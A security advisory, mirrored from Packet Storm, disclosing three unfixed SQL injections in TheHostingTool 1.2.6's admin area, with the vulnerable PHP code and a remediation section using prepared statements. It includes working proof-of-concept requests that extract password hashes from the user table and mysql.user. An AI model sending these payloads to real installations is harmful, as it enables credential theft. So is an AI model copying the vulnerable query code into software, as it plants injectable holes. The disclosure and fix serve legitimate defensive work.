TheHostingTool 1.2.6 SQL Injection

Published: 09 Nov 2015. Reported by Tim Coen. Type: packetstorm. Source: packetstormsecurity.com

TheHostingTool 1.2.6 SQL Injection in three areas: the ajax search, the navbar order update, and the invoice payment-status update

`Security Advisory - Curesec Research Team  
  
1. Introduction  
  
Affected Product: TheHostingTool 1.2.6  
Fixed in: not fixed  
Fixed Version Link: n/a  
Vendor Website: https://thehostingtool.com/  
Vulnerability Type: SQL Injection  
Remote Exploitable: Yes  
Reported to vendor: 09/07/2015  
Disclosed to public: 10/07/2015  
Release mode: Full Disclosure  
CVE: n/a  
Credits Tim Coen of Curesec GmbH  
  
2. Description  
  
There are three SQL Injections in the admin area of TheHostingTool 1.2.6.  
  
The problem is that the defense against SQL Injection depends in part on the  
global GET and POST variables being sanitized using mysql_real_escape_string if  
accessed via postvar or getvar.  
  
This makes them relatively safe to use in a query if the parameter is  
surrounded by quotes. But where the parameter is not surrounded by quotes,  
escaping alone does not prevent SQL injection.  
  
Please note that admin credentials are required for all SQL injections shown  
here.  
  
3. Details  
  
SQL Injection 1  
  
The POST value "type" is used as the column name in a WHERE clause when using  
the ajax search. Encoding single quotes does not prevent SQL injection in this  
case.  
  
It should also be noted that letting the user choose the column of a LIKE query  
on a user table is not a good idea in general, as it makes it easy to iterate  
over the stored passwords this way.  
  
Proof of Concept:  
  
  
POST http://localhost/ecommerce/THTv1.2.6/includes/ajax.php?function=search  
type=user` %3D 1 union all select 1,password,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 from tht_users %23&value=test  
  
Code:  
  
  
includes/ajax.php  
public function search() {  
global $main, $db, $style;  
if($_SESSION['logged']) {  
//echo '<script type="text/javascript" src="'.URL.'includes/javascript/jquerytooltip.js">';  
$type = $main->postvar['type'];  
$value = $main->postvar['value'];  
if($main->postvar['num']) {  
$show = $main->postvar['num'];  
} else {  
$show = 10;  
}  
if($main->postvar['page'] != 1) {  
$lower = $main->postvar['page'] * $show;  
$lower = $lower - $show;  
$upper = $lower + $show;  
} else {  
$lower = 0;  
$upper = $show;  
}  
$query = $db->query("SELECT * FROM `<PRE>users`, `<PRE>user_packs` WHERE `{$type}` LIKE '%{$value}%' AND <PRE>user_packs.userid = <PRE>users.id ORDER BY `{$type}` ASC LIMIT {$lower}, {$upper}");  
  
SQL Injection 2  
  
The POST value "order" is used in an update query of an ajax request. Single  
quotes are encoded, but the parameter is not surrounded by single quotes, thus  
making it unnecessary for an attacker to use single quotes, as they do not have  
to break out of the context of a string.  
  
Proof of Concept:  
  
  
POST http://localhost/ecommerce/THTv1.2.6/includes/ajax.php?function=navbar&action=order  
order=1-0 or extractvalue(1,concat(0x7e,(SELECT concat(password) FROM mysql.user limit 0,1)))  
  
Code:  
  
  
includes/ajax.php  
case "order":  
if(isset($P['order'])) {  
$ids = explode("-", $main->getvar['order']);  
$i = 0;  
foreach($ids as $id) {  
echo "updating: " . "UPDATE `navbar` SET `order` = {$i} WHERE `id` = {$id}";  
$db->query("UPDATE `navbar` SET `order` = {$i} WHERE `id` = {$id}");  
$i++;  
}  
}  
break;  
  
SQL Injection 3  
  
When updating the payment status of invoices, the "iid" GET parameter is put  
directly into multiple queries.  
  
Proof of Concept:  
  
  
http://ecommerce/THTv1.2.6/admin/?page=invoices&pay&iid=1' or extractvalue(1,concat(0x7e,(SELECT concat(password) FROM mysql.user limit 0,1))) %23  
  
Code:  
  
  
includes/class_invoice.php  
public function set_paid($iid) { # Pay the invoice by giving invoice id  
global $db, $server;  
$query = $db->query("UPDATE `<PRE>invoices` SET `is_paid` = '1' WHERE `id` = '{$iid}'");  
$query2 = $db->query("SELECT `uid` FROM `<PRE>invoices` WHERE `id` = '{$iid}' LIMIT 1");  
$data2 = $db->fetch_array($query2);  
$query3 = $db->query("SELECT `id` FROM `<PRE>user_packs` WHERE `userid` = '{$data2['uid']}'");  
$data3 = $db->fetch_array($query3);  
$server->unsuspend($data3['id']);  
return $query;  
}  
  
admin/pages/invoices.php  
$invoice->set_paid($_GET['iid']);  
  
4. Solution  
  
This issue has not been fixed.  
  
5. Report Timeline  
  
09/07/2015 Informed Vendor about Issue (no reply)  
09/22/2015 Reminded Vendor of disclosure date (no reply)  
10/07/2015 Disclosed to public  
  
  
Blog Reference:  
http://blog.curesec.com/article/blog/TheHostingTool-126-Multiple-SQL-Injection-77.html  
  
  
`
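One way to close all three holes described above, written as an added example and not TheHostingTool's own code: an allow-list for the column name (escaping cannot protect an identifier), integer validation for the navbar and invoice ids, and PDO prepared statements for every value. It assumes a PDO connection `$db` and the table prefix `tht_` in place of the application's `<PRE>` placeholder.

```php
<?php
// Added example (not TheHostingTool code). Assumes a PDO connection $db
// with ERRMODE_EXCEPTION and the prefix "tht_" for the <PRE> placeholder.

// 1) ajax search: a column name cannot be escaped, so it must come from a
//    fixed allow-list; the LIKE value and LIMIT bounds are bound, not pasted.
function search_users(PDO $db, string $type, string $value, int $page = 1, int $show = 10): array {
    $allowed = ['username', 'email', 'firstname', 'lastname']; // password deliberately absent
    if (!in_array($type, $allowed, true)) {
        throw new InvalidArgumentException('unsupported search column');
    }
    $show  = max(1, min($show, 100));
    $lower = max(0, ($page - 1) * $show);      // LIMIT takes offset, count
    $sql = "SELECT u.* FROM `tht_users` u JOIN `tht_user_packs` p ON p.userid = u.id "
         . "WHERE u.`{$type}` LIKE ? ORDER BY u.`{$type}` ASC LIMIT ?, ?";
    $stmt = $db->prepare($sql);
    $stmt->bindValue(1, '%' . $value . '%', PDO::PARAM_STR);
    $stmt->bindValue(2, $lower, PDO::PARAM_INT);
    $stmt->bindValue(3, $show, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// 2) navbar order: every id must be a plain integer, so anything that is not
//    all digits (e.g. "0 or extractvalue(...)") is rejected before any query.
function update_navbar_order(PDO $db, string $order): int {
    $stmt = $db->prepare("UPDATE `navbar` SET `order` = ? WHERE `id` = ?");
    $i = 0;
    foreach (explode('-', $order) as $id) {
        if (!ctype_digit($id)) {
            throw new InvalidArgumentException('navbar id must be numeric');
        }
        $stmt->execute([$i, (int) $id]);
        $i++;
    }
    return $i;   // number of rows reordered
}

// 3) invoice payment: validate iid as an integer and bind it in both queries;
//    returns the owning uid (for the unsuspend step) or null if not found.
function set_paid(PDO $db, $iid): ?int {
    $iid = filter_var($iid, FILTER_VALIDATE_INT);
    if ($iid === false) {
        return null;
    }
    $db->prepare("UPDATE `tht_invoices` SET `is_paid` = '1' WHERE `id` = ?")->execute([$iid]);
    $st = $db->prepare("SELECT `uid` FROM `tht_invoices` WHERE `id` = ? LIMIT 1");
    $st->execute([$iid]);
    $uid = $st->fetchColumn();
    return $uid === false ? null : (int) $uid;
}
```

Binding the LIKE value still leaves `%` and `_` in user input acting as wildcards, which is harmless for injection but worth escaping if exact-match search is intended.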
